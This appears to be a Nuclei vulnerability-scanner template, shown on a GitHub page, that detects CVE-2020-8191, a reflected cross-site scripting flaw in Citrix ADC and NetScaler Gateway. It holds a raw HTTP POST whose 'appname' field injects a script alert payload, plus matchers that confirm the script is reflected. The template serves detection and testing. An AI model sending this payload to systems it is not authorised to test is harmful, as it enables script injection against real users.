-
Notifications
You must be signed in to change notification settings - Fork 222
/
CVE-2020-8191.yaml
41 lines (35 loc) · 1.16 KB
/
CVE-2020-8191.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
id: CVE-2020-8191
info:
name: Citrix ADC & NetScaler Gateway Reflected XSS
author: dwisiswant0
severity: medium
tags: cve,cve2020,citrix,xss
reference: https://support.citrix.com/article/CTX276688
description: |
Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-8191
cwe-id: CWE-79
requests:
- raw:
- |
POST /menu/stapp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
matchers-condition: and
matchers:
- type: word
words:
- "</title><script>alert(31337)</script>"
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header